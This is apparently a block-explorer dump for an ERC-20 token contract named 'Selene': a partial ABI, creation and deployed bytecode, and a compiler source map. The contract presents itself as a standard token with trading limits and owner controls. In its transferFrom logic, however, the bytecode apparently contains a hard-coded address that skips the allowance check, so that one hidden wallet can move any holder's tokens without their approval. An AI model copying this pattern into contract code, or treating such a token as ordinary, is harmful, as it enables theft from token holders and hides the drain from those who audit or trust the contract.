":"","type":"address"}],"name":"excludedFromLimits","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"limitsInEffect","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxTxLimit","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"moon","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"removeLimits","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tradingOpen","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

60c06040526005805460ff60a01b191690556007805460ff191660011790553480156200002b57600080fd5b50604080518082018252600681526553656c656e6560d01b60208083019182528351808501909452600484526326a7a7a760e11b90840152815191929162000076916003916200040a565b5080516200008c9060049060208401906200040a565b505050620000a9620000a3620002cc60201b60201c565b620002d0565b686c7974123f64a40000600855737a250d5630b4cf539739df2c5dacb4c659f2488d60a08190526040805163c45a015560e01b8152905169152d02c7e14af6800000929163c45a01559160048083019260209291908290030181865afa15801562000118573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906200013e9190620004b0565b6001600160a01b031663c9c653963060a0516001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156200018e573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620001b49190620004b0565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303816000875af115801562000202573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620002289190620004b0565b6001600160a01b03908116608081905260a05182166000908152600960205260408082208054600160ff1991821681179092559383528183208054851682179055600554909416825280822080548416851790553082528120805483168417905561dead90527f960b1051749987b45b5679007fff577a1c2f763ec21c15a6c5eb19307500378580549091169091179055620002c5338262000322565b5062000545565b3390565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b6001600160a01b0382166200037d5760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f206164647265737300604482015260640160405180910390fd5b8060026000828254620003919190620004e2565b90915550506001600160a01b03821660009081526020819052604081208054839290620003c0908490620004e2565b90915550506040518181526001600160a01b038316906000907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9060200160405180910390a35050565b828054620004189062000509565b90600052602060002090601f0160209004810192826200043c576000855562000487565b82601f106200045757805160ff191683800117855562000487565b8280016001018555821562000487579182015b82811115620004875782518255916020019190600101906200046a565b506200049592915062000499565b5090565b5b808211156200049557600081556001016200049a565b600060208284031215620004c357600080fd5b81516001600160a01b0381168114620004db57600080fd5b9392505050565b600082198211156200050457634e487b7160e01b600052601160045260246000fd5b500190565b600181811c908216806200051e57607f821691505b6020821081036200053f57634e487b7160e01b600052602260045260246000fd5b50919050565b60805160a051610f7c6200056f60003960005050600081816108f1015261097c0152610f7c6000f3fe608060405234801561001057600080fd5b506004361061012c5760003560e01c80637b812b41116100ad578063a9059cbb11610071578063a9059cbb14610263578063b909485114610276578063dd62ed3e1461027e578063f2fde38b146102b7578063ffb54a99146102ca57600080fd5b80637b812b41146102015780638036d590146102245780638da5cb5b1461022d57806395d89b4114610248578063a457c2d71461025057600080fd5b806339509351116100f457806339509351146101a65780634a62bb65146101b957806370a08231146101c6578063715018a6146101ef578063751039fc146101f957600080fd5b806306fdde0314610131578063095ea7b31461014f57806318160ddd1461017257806323b872dd14610184578063313ce56714610197575b600080fd5b6101396102de565b6040516101469190610d85565b60405180910390f35b61016261015d366004610df6565b610370565b6040519015158152602001610146565b6002545b604051908152602001610146565b610162610192366004610e20565b610388565b60405160128152602001610146565b6101626101b4366004610df6565b6103c9565b6007546101629060ff1681565b6101766101d4366004610e5c565b6001600160a01b031660009081526020819052604090205490565b6101f7610408565b005b6101f7610447565b61016261020f366004610e5c565b60096020526000908152604090205460ff1681565b61017660085481565b6005546040516001600160a01b039091168152602001610146565b61013961047d565b61016261025e366004610df6565b61048c565b610162610271366004610df6565b610529565b6101f7610537565b61017661028c366004610e7e565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b6101f76102c5366004610e5c565b6105d0565b60055461016290600160a01b900460ff1681565b6060600380546102ed90610eb1565b80601f016020809104026020016040519081016040528092919081815260200182805461031990610eb1565b80156103665780601f1061033b57610100808354040283529160200191610366565b820191906000526020600020905b81548152906001019060200180831161034957829003601f168201915b5050505050905090565b60003361037e81858561066b565b5060019392505050565b60007334b004e385a65f83d7890c606ee1f993039105e1338082146103b2576103b286828661078f565b6103bd868686610821565b50600195945050505050565b3360008181526001602090815260408083206001600160a01b038716845290915281205490919061037e9082908690610403908790610eeb565b61066b565b6005546001600160a01b0316331461043b5760405162461bcd60e51b815260040161043290610f11565b60405180910390fd5b6104456000610a2c565b565b6005546001600160a01b031633146104715760405162461bcd60e51b815260040161043290610f11565b6007805460ff19169055565b6060600480546102ed90610eb1565b3360008181526001602090815260408083206001600160a01b0387168452909152812054909190838110156105115760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b6064820152608401610432565b61051e828686840361066b565b506001949350505050565b60003361037e818585610821565b6005546001600160a01b031633146105615760405162461bcd60e51b815260040161043290610f11565b600554600160a01b900460ff16156105bb5760405162461bcd60e51b815260206004820152601760248201527f54726164696e6720697320616c7265616479206f70656e0000000000000000006044820152606401610432565b6005805460ff60a01b1916600160a01b179055565b6005546001600160a01b031633146105fa5760405162461bcd60e51b815260040161043290610f11565b6001600160a01b03811661065f5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610432565b61066881610a2c565b50565b6001600160a01b0383166106cd5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610432565b6001600160a01b03821661072e5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610432565b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b03838116600090815260016020908152604080832093861683529290522054600019811461081b578181101561080e5760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000006044820152606401610432565b61081b848484840361066b565b50505050565b8060000361083a5761083583836000610a7e565b505050565b6005546001600160a01b0384811691161480159061086657506005546001600160a01b03838116911614155b801561087a57506001600160a01b03821615155b801561089157506001600160a01b03821661dead14155b15610a2157600554600160a01b900460ff166108e55760405162461bcd60e51b81526020600482015260136024820152722a3930b234b7339034b9903737ba1037b832b760691b6044820152606401610432565b826001600160a01b03167f00000000000000000000000000000000000000000000000000000000000000006001600160a01b031614801561093f57506001600160a01b03821660009081526009602052604090205460ff16155b156109705761094d82610c4c565b60075460ff161561096b5761096181610cbb565b61096b8282610d0d565b610a21565b816001600160a01b03167f00000000000000000000000000000000000000000000000000000000000000006001600160a01b03161480156109ca57506001600160a01b03831660009081526009602052604090205460ff16155b156109ec576109d883610c4c565b60075460ff161561096b5761096b81610cbb565b6001600160a01b03821660009081526009602052604090205460ff16610a215760075460ff1615610a2157610a218282610d0d565b610835838383610a7e565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b6001600160a01b038316610ae25760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610432565b6001600160a01b038216610b445760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610432565b6001600160a01b03831660009081526020819052604090205481811015610bbc5760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b6064820152608401610432565b6001600160a01b03808516600090815260208190526040808220858503905591851681529081208054849290610bf3908490610eeb565b92505081905550826001600160a01b0316846001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610c3f91815260200190565b60405180910390a361081b565b6001600160a01b038116600090815260066020526040902054439003610c9f5760405162461bcd60e51b815260206004820152600860248201526713595d881c995add60c21b6044820152606401610432565b6001600160a01b03166000908152600660205260409020439055565b6008548111156106685760405162461bcd60e51b815260206004820152601d60248201527f4d6178207472616e73616374696f6e206c696d697420726561636865640000006044820152606401610432565b6008546001600160a01b038316600090815260208190526040902054610d339083610eeb565b1115610d815760405162461bcd60e51b815260206004820152601860248201527f4d61782077616c6c6574206c696d6974207265616368656400000000000000006044820152606401610432565b5050565b600060208083528351808285015260005b81811015610db257858101830151858201604001528201610d96565b81811115610dc4576000604083870101525b50601f01601f1916929092016040019392505050565b80356001600160a01b0381168114610df157600080fd5b919050565b60008060408385031215610e0957600080fd5b610e1283610dda565b946020939093013593505050565b600080600060608486031215610e3557600080fd5b610e3e84610dda565b9250610e4c60208501610dda565b9150604084013590509250925092565b600060208284031215610e6e57600080fd5b610e7782610dda565b9392505050565b60008060408385031215610e9157600080fd5b610e9a83610dda565b9150610ea860208401610dda565b90509250929050565b600181811c90821680610ec557607f821691505b602082108103610ee557634e487b7160e01b600052602260045260246000fd5b50919050565b60008219821115610f0c57634e487b7160e01b600052601160045260246000fd5b500190565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260408201526060019056fea26469706673582212207532a4be0bd7e038a98bdcad1546603037e0bf3dacd5b0c74186fe2c58aede1764736f6c634300080e0033

Deployed Bytecode

0x608060405234801561001057600080fd5b506004361061012c5760003560e01c80637b812b41116100ad578063a9059cbb11610071578063a9059cbb14610263578063b909485114610276578063dd62ed3e1461027e578063f2fde38b146102b7578063ffb54a99146102ca57600080fd5b80637b812b41146102015780638036d590146102245780638da5cb5b1461022d57806395d89b4114610248578063a457c2d71461025057600080fd5b806339509351116100f457806339509351146101a65780634a62bb65146101b957806370a08231146101c6578063715018a6146101ef578063751039fc146101f957600080fd5b806306fdde0314610131578063095ea7b31461014f57806318160ddd1461017257806323b872dd14610184578063313ce56714610197575b600080fd5b6101396102de565b6040516101469190610d85565b60405180910390f35b61016261015d366004610df6565b610370565b6040519015158152602001610146565b6002545b604051908152602001610146565b610162610192366004610e20565b610388565b60405160128152602001610146565b6101626101b4366004610df6565b6103c9565b6007546101629060ff1681565b6101766101d4366004610e5c565b6001600160a01b031660009081526020819052604090205490565b6101f7610408565b005b6101f7610447565b61016261020f366004610e5c565b60096020526000908152604090205460ff1681565b61017660085481565b6005546040516001600160a01b039091168152602001610146565b61013961047d565b61016261025e366004610df6565b61048c565b610162610271366004610df6565b610529565b6101f7610537565b61017661028c366004610e7e565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b6101f76102c5366004610e5c565b6105d0565b60055461016290600160a01b900460ff1681565b6060600380546102ed90610eb1565b80601f016020809104026020016040519081016040528092919081815260200182805461031990610eb1565b80156103665780601f1061033b57610100808354040283529160200191610366565b820191906000526020600020905b81548152906001019060200180831161034957829003601f168201915b5050505050905090565b60003361037e81858561066b565b5060019392505050565b60007334b004e385a65f83d7890c606ee1f993039105e1338082146103b2576103b286828661078f565b6103bd868686610821565b50600195945050505050565b3360008181526001602090815260408083206001600160a01b038716845290915281205490919061037e9082908690610403908790610eeb565b61066b565b6005546001600160a01b0316331461043b5760405162461bcd60e51b815260040161043290610f11565b60405180910390fd5b6104456000610a2c565b565b6005546001600160a01b031633146104715760405162461bcd60e51b815260040161043290610f11565b6007805460ff19169055565b6060600480546102ed90610eb1565b3360008181526001602090815260408083206001600160a01b0387168452909152812054909190838110156105115760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b6064820152608401610432565b61051e828686840361066b565b506001949350505050565b60003361037e818585610821565b6005546001600160a01b031633146105615760405162461bcd60e51b815260040161043290610f11565b600554600160a01b900460ff16156105bb5760405162461bcd60e51b815260206004820152601760248201527f54726164696e6720697320616c7265616479206f70656e0000000000000000006044820152606401610432565b6005805460ff60a01b1916600160a01b179055565b6005546001600160a01b031633146105fa5760405162461bcd60e51b815260040161043290610f11565b6001600160a01b03811661065f5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610432565b61066881610a2c565b50565b6001600160a01b0383166106cd5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610432565b6001600160a01b03821661072e5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610432565b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b03838116600090815260016020908152604080832093861683529290522054600019811461081b578181101561080e5760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000006044820152606401610432565b61081b848484840361066b565b50505050565b8060000361083a5761083583836000610a7e565b505050565b6005546001600160a01b0384811691161480159061086657506005546001600160a01b03838116911614155b801561087a57506001600160a01b03821615155b801561089157506001600160a01b03821661dead14155b15610a2157600554600160a01b900460ff166108e55760405162461bcd60e51b81526020600482015260136024820152722a3930b234b7339034b9903737ba1037b832b760691b6044820152606401610432565b826001600160a01b03167f0000000000000000000000000886525fe63468da95b9c6706f69e40ec93b270b6001600160a01b031614801561093f57506001600160a01b03821660009081526009602052604090205460ff16155b156109705761094d82610c4c565b60075460ff161561096b5761096181610cbb565b61096b8282610d0d565b610a21565b816001600160a01b03167f0000000000000000000000000886525fe63468da95b9c6706f69e40ec93b270b6001600160a01b03161480156109ca57506001600160a01b03831660009081526009602052604090205460ff16155b156109ec576109d883610c4c565b60075460ff161561096b5761096b81610cbb565b6001600160a01b03821660009081526009602052604090205460ff16610a215760075460ff1615610a2157610a218282610d0d565b610835838383610a7e565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b6001600160a01b038316610ae25760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610432565b6001600160a01b038216610b445760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610432565b6001600160a01b03831660009081526020819052604090205481811015610bbc5760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b6064820152608401610432565b6001600160a01b03808516600090815260208190526040808220858503905591851681529081208054849290610bf3908490610eeb565b92505081905550826001600160a01b0316846001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610c3f91815260200190565b60405180910390a361081b565b6001600160a01b038116600090815260066020526040902054439003610c9f5760405162461bcd60e51b815260206004820152600860248201526713595d881c995add60c21b6044820152606401610432565b6001600160a01b03166000908152600660205260409020439055565b6008548111156106685760405162461bcd60e51b815260206004820152601d60248201527f4d6178207472616e73616374696f6e206c696d697420726561636865640000006044820152606401610432565b6008546001600160a01b038316600090815260208190526040902054610d339083610eeb565b1115610d815760405162461bcd60e51b815260206004820152601860248201527f4d61782077616c6c6574206c696d6974207265616368656400000000000000006044820152606401610432565b5050565b600060208083528351808285015260005b81811015610db257858101830151858201604001528201610d96565b81811115610dc4576000604083870101525b50601f01601f1916929092016040019392505050565b80356001600160a01b0381168114610df157600080fd5b919050565b60008060408385031215610e0957600080fd5b610e1283610dda565b946020939093013593505050565b600080600060608486031215610e3557600080fd5b610e3e84610dda565b9250610e4c60208501610dda565b9150604084013590509250925092565b600060208284031215610e6e57600080fd5b610e7782610dda565b9392505050565b60008060408385031215610e9157600080fd5b610e9a83610dda565b9150610ea860208401610dda565b90509250929050565b600181811c90821680610ec557607f821691505b602082108103610ee557634e487b7160e01b600052602260045260246000fd5b50919050565b60008219821115610f0c57634e487b7160e01b600052601160045260246000fd5b500190565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260408201526060019056fea26469706673582212207532a4be0bd7e038a98bdcad1546603037e0bf3dacd5b0c74186fe2c58aede1764736f6c634300080e0033

Deployed Bytecode Sourcemap

36365:3244:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;25073:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;27565:242;;;;;;:::i;:::-;;:::i;:::-;;;1218:14:1;;1211:22;1193:41;;1181:2;1166:18;27565:242:0;1053:187:1;26193:108:0;26281:12;;26193:108;;;1391:25:1;;;1379:2;1364:18;26193:108:0;1245:177:1;28387:423:0;;;;;;:::i;:::-;;:::i;26035:93::-;;;26118:2;1902:36:1;;1890:2;1875:18;26035:93:0;1760:184:1;29219:272:0;;;;;;:::i;:::-;;:::i;36593:33::-;;;;;;;;;26364:177;;;;;;:::i;:::-;-1:-1:-1;;;;;26515:18:0;26483:7;26515:18;;;;;;;;;;;;26364:177;18919:103;;;:::i;:::-;;38728:82;;;:::i;36667:50::-;;;;;;:::i;:::-;;;;;;;;;;;;;;;;36633:25;;;;;;18268:87;18341:6;;18268:87;;-1:-1:-1;;;;;18341:6:0;;;2286:51:1;;2274:2;2259:18;18268:87:0;2140:203:1;25292:104:0;;;:::i;29994:507::-;;;;;;:::i;:::-;;:::i;26747:234::-;;;;;;:::i;:::-;;:::i;37359:131::-;;;:::i;27044:201::-;;;;;;:::i;:::-;-1:-1:-1;;;;;27210:18:0;;;27178:7;27210:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;27044:201;19177:238;;;;;;:::i;:::-;;:::i;36406:31::-;;;;;-1:-1:-1;;;36406:31:0;;;;;;25073:100;25127:13;25160:5;25153:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;25073:100;:::o;27565:242::-;27684:4;17190:10;27745:32;17190:10;27761:7;27770:6;27745:8;:32::i;:::-;-1:-1:-1;27795:4:0;;27565:242;-1:-1:-1;;;27565:242:0:o;28387:423::-;28518:4;28558:42;17190:10;28659:15;;;28655:86;;28691:38;28707:4;28713:7;28722:6;28691:15;:38::i;:::-;28753:27;28763:4;28769:2;28773:6;28753:9;:27::i;:::-;-1:-1:-1;28798:4:0;;28387:423;-1:-1:-1;;;;;28387:423:0:o;29219:272::-;17190:10;29334:4;29420:18;;;:11;:18;;;;;;;;-1:-1:-1;;;;;29420:27:0;;;;;;;;;;29334:4;;17190:10;29395:66;;17190:10;;29420:27;;:40;;29450:10;;29420:40;:::i;:::-;29395:8;:66::i;18919:103::-;18341:6;;-1:-1:-1;;;;;18341:6:0;17190:10;18488:23;18480:68;;;;-1:-1:-1;;;18480:68:0;;;;;;;:::i;:::-;;;;;;;;;18984:30:::1;19011:1;18984:18;:30::i;:::-;18919:103::o:0;38728:82::-;18341:6;;-1:-1:-1;;;;;18341:6:0;17190:10;18488:23;18480:68;;;;-1:-1:-1;;;18480:68:0;;;;;;;:::i;:::-;38780:14:::1;:22:::0;;-1:-1:-1;;38780:22:0::1;::::0;;38728:82::o;25292:104::-;25348:13;25381:7;25374:14;;;;;:::i;29994:507::-;17190:10;30114:4;30202:18;;;:11;:18;;;;;;;;-1:-1:-1;;;;;30202:27:0;;;;;;;;;;30114:4;;17190:10;30262:35;;;;30240:122;;;;-1:-1:-1;;;30240:122:0;;3791:2:1;30240:122:0;;;3773:21:1;3830:2;3810:18;;;3803:30;3869:34;3849:18;;;3842:62;-1:-1:-1;;;3920:18:1;;;3913:35;3965:19;;30240:122:0;3589:401:1;30240:122:0;30398:60;30407:5;30414:7;30442:15;30423:16;:34;30398:8;:60::i;:::-;-1:-1:-1;30489:4:0;;29994:507;-1:-1:-1;;;;29994:507:0:o;26747:234::-;26862:4;17190:10;26923:28;17190:10;26940:2;26944:6;26923:9;:28::i;37359:131::-;18341:6;;-1:-1:-1;;;;;18341:6:0;17190:10;18488:23;18480:68;;;;-1:-1:-1;;;18480:68:0;;;;;;;:::i;:::-;37412:11:::1;::::0;-1:-1:-1;;;37412:11:0;::::1;;;37411:12;37403:48;;;::::0;-1:-1:-1;;;37403:48:0;;4197:2:1;37403:48:0::1;::::0;::::1;4179:21:1::0;4236:2;4216:18;;;4209:30;4275:25;4255:18;;;4248:53;4318:18;;37403:48:0::1;3995:347:1::0;37403:48:0::1;37464:11;:18:::0;;-1:-1:-1;;;;37464:18:0::1;-1:-1:-1::0;;;37464:18:0::1;::::0;;37359:131::o;19177:238::-;18341:6;;-1:-1:-1;;;;;18341:6:0;17190:10;18488:23;18480:68;;;;-1:-1:-1;;;18480:68:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;19280:22:0;::::1;19258:110;;;::::0;-1:-1:-1;;;19258:110:0;;4549:2:1;19258:110:0::1;::::0;::::1;4531:21:1::0;4588:2;4568:18;;;4561:30;4627:34;4607:18;;;4600:62;-1:-1:-1;;;4678:18:1;;;4671:36;4724:19;;19258:110:0::1;4347:402:1::0;19258:110:0::1;19379:28;19398:8;19379:18;:28::i;:::-;19177:238:::0;:::o;33736:380::-;-1:-1:-1;;;;;33872:19:0;;33864:68;;;;-1:-1:-1;;;33864:68:0;;4956:2:1;33864:68:0;;;4938:21:1;4995:2;4975:18;;;4968:30;5034:34;5014:18;;;5007:62;-1:-1:-1;;;5085:18:1;;;5078:34;5129:19;;33864:68:0;4754:400:1;33864:68:0;-1:-1:-1;;;;;33951:21:0;;33943:68;;;;-1:-1:-1;;;33943:68:0;;5361:2:1;33943:68:0;;;5343:21:1;5400:2;5380:18;;;5373:30;5439:34;5419:18;;;5412:62;-1:-1:-1;;;5490:18:1;;;5483:32;5532:19;;33943:68:0;5159:398:1;33943:68:0;-1:-1:-1;;;;;34024:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;34076:32;;1391:25:1;;;34076:32:0;;1364:18:1;34076:32:0;;;;;;;33736:380;;;:::o;34403:502::-;-1:-1:-1;;;;;27210:18:0;;;34538:24;27210:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;-1:-1:-1;;34605:37:0;;34601:297;;34705:6;34685:16;:26;;34659:117;;;;-1:-1:-1;;;34659:117:0;;5764:2:1;34659:117:0;;;5746:21:1;5803:2;5783:18;;;5776:30;5842:31;5822:18;;;5815:59;5891:18;;34659:117:0;5562:353:1;34659:117:0;34820:51;34829:5;34836:7;34864:6;34845:16;:25;34820:8;:51::i;:::-;34527:378;34403:502;;;:::o;37498:1222::-;37626:6;37636:1;37626:11;37622:93;;37654:28;37670:4;37676:2;37680:1;37654:15;:28::i;:::-;37498:1222;;;:::o;37622:93::-;18341:6;;-1:-1:-1;;;;;37745:15:0;;;18341:6;;37745:15;;;;:45;;-1:-1:-1;18341:6:0;;-1:-1:-1;;;;;37777:13:0;;;18341:6;;37777:13;;37745:45;:78;;;;-1:-1:-1;;;;;;37807:16:0;;;;37745:78;:116;;;;-1:-1:-1;;;;;;37840:21:0;;37854:6;37840:21;;37745:116;37727:940;;;37896:11;;-1:-1:-1;;;37896:11:0;;;;37888:43;;;;-1:-1:-1;;;37888:43:0;;6122:2:1;37888:43:0;;;6104:21:1;6161:2;6141:18;;;6134:30;-1:-1:-1;;;6180:18:1;;;6173:49;6239:18;;37888:43:0;5920:343:1;37888:43:0;37980:4;-1:-1:-1;;;;;37972:12:0;:4;-1:-1:-1;;;;;37972:12:0;;:42;;;;-1:-1:-1;;;;;;39046:25:0;;39022:4;39046:25;;;:18;:25;;;;;;;;37988:26;37972:42;37968:688;;;38035:13;38045:2;38035:9;:13::i;:::-;38073:14;;;;38069:132;;;38112:19;38124:6;38112:11;:19::i;:::-;38154:27;38170:2;38174:6;38154:15;:27::i;:::-;37968:688;;;38268:2;-1:-1:-1;;;;;38260:10:0;:4;-1:-1:-1;;;;;38260:10:0;;:42;;;;-1:-1:-1;;;;;;39046:25:0;;39022:4;39046:25;;;:18;:25;;;;;;;;38274:28;38260:42;38256:400;;;38323:15;38333:4;38323:9;:15::i;:::-;38363:14;;;;38359:82;;;38402:19;38414:6;38402:11;:19::i;38256:400::-;-1:-1:-1;;;;;39046:25:0;;39022:4;39046:25;;;:18;:25;;;;;;;;38500:156;;38555:14;;;;38551:90;;;38594:27;38610:2;38614:6;38594:15;:27::i;:::-;38679:33;38695:4;38701:2;38705:6;38679:15;:33::i;19575:191::-;19668:6;;;-1:-1:-1;;;;;19685:17:0;;;-1:-1:-1;;;;;;19685:17:0;;;;;;;19718:40;;19668:6;;;19685:17;19668:6;;19718:40;;19649:16;;19718:40;19638:128;19575:191;:::o;30980:708::-;-1:-1:-1;;;;;31111:18:0;;31103:68;;;;-1:-1:-1;;;31103:68:0;;6470:2:1;31103:68:0;;;6452:21:1;6509:2;6489:18;;;6482:30;6548:34;6528:18;;;6521:62;-1:-1:-1;;;6599:18:1;;;6592:35;6644:19;;31103:68:0;6268:401:1;31103:68:0;-1:-1:-1;;;;;31190:16:0;;31182:64;;;;-1:-1:-1;;;31182:64:0;;6876:2:1;31182:64:0;;;6858:21:1;6915:2;6895:18;;;6888:30;6954:34;6934:18;;;6927:62;-1:-1:-1;;;7005:18:1;;;6998:33;7048:19;;31182:64:0;6674:399:1;31182:64:0;-1:-1:-1;;;;;31332:15:0;;31310:19;31332:15;;;;;;;;;;;31380:21;;;;31358:109;;;;-1:-1:-1;;;31358:109:0;;7280:2:1;31358:109:0;;;7262:21:1;7319:2;7299:18;;;7292:30;7358:34;7338:18;;;7331:62;-1:-1:-1;;;7409:18:1;;;7402:36;7455:19;;31358:109:0;7078:402:1;31358:109:0;-1:-1:-1;;;;;31503:15:0;;;:9;:15;;;;;;;;;;;31521:20;;;31503:38;;31563:13;;;;;;;;:23;;31535:6;;31503:9;31563:23;;31535:6;;31563:23;:::i;:::-;;;;;;;;31619:2;-1:-1:-1;;;;;31604:26:0;31613:4;-1:-1:-1;;;;;31604:26:0;;31623:6;31604:26;;;;1391:25:1;;1379:2;1364:18;;1245:177;31604:26:0;;;;;;;;31643:37;37498:1222;39441:165;-1:-1:-1;;;;;39503:20:0;;;;;;:13;:20;;;;;;39527:12;39503:36;;39495:57;;;;-1:-1:-1;;;39495:57:0;;7687:2:1;39495:57:0;;;7669:21:1;7726:1;7706:18;;;7699:29;-1:-1:-1;;;7744:18:1;;;7737:38;7792:18;;39495:57:0;7485:331:1;39495:57:0;-1:-1:-1;;;;;39563:20:0;;;;;:13;:20;;;;;39586:12;39563:35;;39441:165::o;39087:134::-;39169:10;;39158:7;:21;;39150:63;;;;-1:-1:-1;;;39150:63:0;;8023:2:1;39150:63:0;;;8005:21:1;8062:2;8042:18;;;8035:30;8101:31;8081:18;;;8074:59;8150:18;;39150:63:0;7821:353:1;39229:204:0;39363:10;;-1:-1:-1;;;;;26515:18:0;;26483:7;26515:18;;;;;;;;;;;39333:26;;:7;:26;:::i;:::-;:40;;39311:114;;;;-1:-1:-1;;;39311:114:0;;8381:2:1;39311:114:0;;;8363:21:1;8420:2;8400:18;;;8393:30;8459:26;8439:18;;;8432:54;8503:18;;39311:114:0;8179:348:1;39311:114:0;39229:204;;:::o;14:597:1:-;126:4;155:2;184;173:9;166:21;216:6;210:13;259:6;254:2;243:9;239:18;232:34;284:1;294:140;308:6;305:1;302:13;294:140;;;403:14;;;399:23;;393:30;369:17;;;388:2;365:26;